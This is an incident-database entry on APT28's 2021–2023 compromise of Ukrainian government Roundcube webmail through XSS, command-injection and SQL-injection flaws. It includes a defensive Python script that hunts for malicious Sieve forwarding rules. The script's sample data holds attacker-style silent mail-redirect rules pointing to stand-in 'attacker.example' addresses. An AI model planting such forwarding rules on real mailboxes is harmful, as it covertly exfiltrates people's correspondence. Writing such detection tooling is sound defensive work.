
Cyber Incident Victim: KP in Ukraine

Date:

Nov 2021

Location:

Ukraine

Summary

Russian APT28 hackers, affiliated with the GRU, compromised Ukrainian government email servers by sending malicious emails that exploited unpatched Roundcube webmail vulnerabilities. Once inside, the attackers deployed scripts that redirected targeted individuals' incoming mail to attacker-controlled addresses and stole Roundcube address books, session cookies and other database contents for military intelligence collection. Targets included government entities, a regional prosecutor's office and an organization working on military aircraft infrastructure, in line with APT28's broader practice of exploiting unpatched software to support Russian strategic objectives. The campaign infrastructure was active from at least November 2021 and overlapped in time with the group's exploitation of a Microsoft Outlook zero-day and a Cisco router vulnerability against European and North American targets.

CIA Posture: available to members
Motives: 2 (details available to members)
Tactics, Techniques & Procedures: 1 technique (details available to members)
Threat Actor: 1 actor (details available to members)
Type: available to members
Location: available to members

Description

In June 2023, Ukraine's Computer Emergency Response Team (CERT-UA) and Recorded Future's Insikt Group disclosed that Russian military intelligence hackers from APT28 (also known as BlueDelta, Fancy Bear, Sednit, and Sofacy) had breached Roundcube webmail servers belonging to multiple Ukrainian government entities and other organizations. The attackers exploited three vulnerabilities in unpatched Roundcube installations: CVE-2020-35730 (a cross-site scripting bug in how Roundcube renders email content), CVE-2020-12641 (command injection through Roundcube configuration settings) and CVE-2021-44026 (SQL injection). The phishing emails were themed on the ongoing Russia-Ukraine conflict to get recipients to open them, and the exploit chain fired as soon as the message was rendered in a vulnerable Roundcube instance; no link or attachment had to be clicked, which is why the compromise is described as requiring no further user interaction. Once they had access to a server, the hackers deployed malicious scripts that redirected incoming emails for targeted individuals to attacker-controlled addresses. Other scripts harvested Roundcube address books, session cookies and other information stored in the Roundcube database for reconnaissance and intelligence gathering. The campaign's infrastructure had been operational since at least November 2021, and specific targets included a regional Ukrainian prosecutor's office, a central executive authority, and an organization involved in upgrading military aircraft infrastructure. Investigators concluded the operation aimed to collect military intelligence in support of Russia's invasion of Ukraine.
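The persistence mechanism that matters to a defender here is the silent mail redirect: once a forward is in place, the attacker keeps receiving a victim's mail even after the webmail bug is patched. The page does not say how the redirect scripts were implemented, so the audit below is an added example written for this page, not code from the original report, CERT-UA or Roundcube. It assumes the forwarding shows up as Sieve rules, which is what Roundcube's managesieve plugin writes for user filters, and that the defender knows its own mail domains (the INTERNAL_DOMAINS set and the sample scripts are constructed for the example). The same logic applies to any other filter store once the rules have been dumped to text.

```python
"""Hunt for attacker-style mail forwarding in per-user Sieve scripts.

Added example for this incident page. Sample scripts and domain names are
constructed; INTERNAL_DOMAINS is an assumption standing in for the real
organisation's mail domains.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Assumption: every domain the organisation legitimately delivers to.
# A redirect anywhere else moves mail out of the defender's control.
INTERNAL_DOMAINS = {"gov.example", "mail.gov.example"}

# Sieve "redirect" with an optional :copy tag. With :copy the original is
# still delivered, so the victim notices nothing; that is the stealthy form.
REDIRECT_RE = re.compile(r'\bredirect\s+(:copy\s+)?"([^"]+)"\s*;', re.IGNORECASE)

# Strip "#" line comments and "/* */" block comments before matching so that
# a commented-out rule does not produce a false positive. (An "@" address
# containing "#" would be mangled; that does not occur in practice.)
COMMENT_RE = re.compile(r"#[^\n]*|/\*.*?\*/", re.DOTALL)


@dataclass(frozen=True)
class Finding:
    user: str      # mailbox owner whose script contains the rule
    target: str    # where the mail is being sent
    silent: bool   # True when :copy keeps a local copy (victim sees nothing odd)


def is_external(addr: str) -> bool:
    """True when the address domain is outside the organisation."""
    domain = addr.rsplit("@", 1)[-1].lower()
    return domain not in INTERNAL_DOMAINS


def audit_sieve(user: str, script: str) -> list[Finding]:
    """Return one Finding per redirect action whose target is external."""
    cleaned = COMMENT_RE.sub("", script)
    findings: list[Finding] = []
    for copy_tag, target in REDIRECT_RE.findall(cleaned):
        if is_external(target):
            findings.append(Finding(user, target, silent=bool(copy_tag)))
    return findings


def run_audit(scripts: dict[str, str]) -> list[Finding]:
    """Audit a mapping of username -> Sieve script text."""
    return [f for user, text in scripts.items() for f in audit_sieve(user, text)]


# Constructed sample scripts, not real victim data.
SAMPLE_SCRIPTS = {
    # Legitimate filing rule: nothing leaves the mailbox.
    "analyst": 'require ["fileinto"];\n'
               'if header :contains "subject" "newsletter" { fileinto "Lists"; }',
    # Attacker-style silent forward of everything to an external collector.
    "prosecutor": 'require ["copy"];\n'
                  '# forward all\n'
                  'if true { redirect :copy "collector@attacker.example"; }',
    # Redirect to an internal archive address: allowed.
    "clerk": 'redirect "archive@mail.gov.example";',
    # Commented-out rule must be ignored; the live one must be caught.
    "tricky": '# redirect "old@attacker.example";\n'
              'if allof(true) { redirect "x@attacker.example"; }',
}


if __name__ == "__main__":
    for f in run_audit(SAMPLE_SCRIPTS):
        kind = "SILENT copy-forward" if f.silent else "forward (original not kept)"
        print(f"{f.user}: {kind} to {f.target}")
```

Run it against a dump of every user's active Sieve script (for Dovecot, the files under each user's sieve directory; for Roundcube's managesieve plugin, the script it manages on the IMAP server). Treat a hit on a mailbox belonging to a prosecutor's office or a defence-related organisation, as in this incident, as an incident in its own right rather than a policy violation: the forward is the exfiltration channel, and the address it points to is a pivot for further hunting.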


APT28's tactics overlapped with its other campaigns of the period, including the exploitation, beginning in 2022, of the Microsoft Outlook zero-day CVE-2023-23397 (disclosed and patched in March 2023) against European government, military, energy and transportation organizations. In that campaign the group stole credentials to move laterally within networks and exfiltrated email by altering mailbox permissions. Google's Threat Analysis Group reported that Russian government-backed actors, APT28 among them, were responsible for roughly 60% of phishing emails targeting Ukraine in early 2023. The group also used a long-patched Cisco IOS SNMP vulnerability, not a zero-day, to deploy the Jaguar Tooth implant on routers at U.S. and EU organizations, as described in an April 2023 joint advisory from U.S. and UK agencies. APT28 has a history of high-profile cyber-espionage, including the 2015 breach of the German Federal Parliament and the 2016 attacks on the Democratic National Committee, which led to U.S. indictments and, in 2020, EU sanctions against its members. The Ukrainian breach underscored APT28's continued reliance on unpatched software vulnerabilities to gather strategic intelligence amid the ongoing conflict.
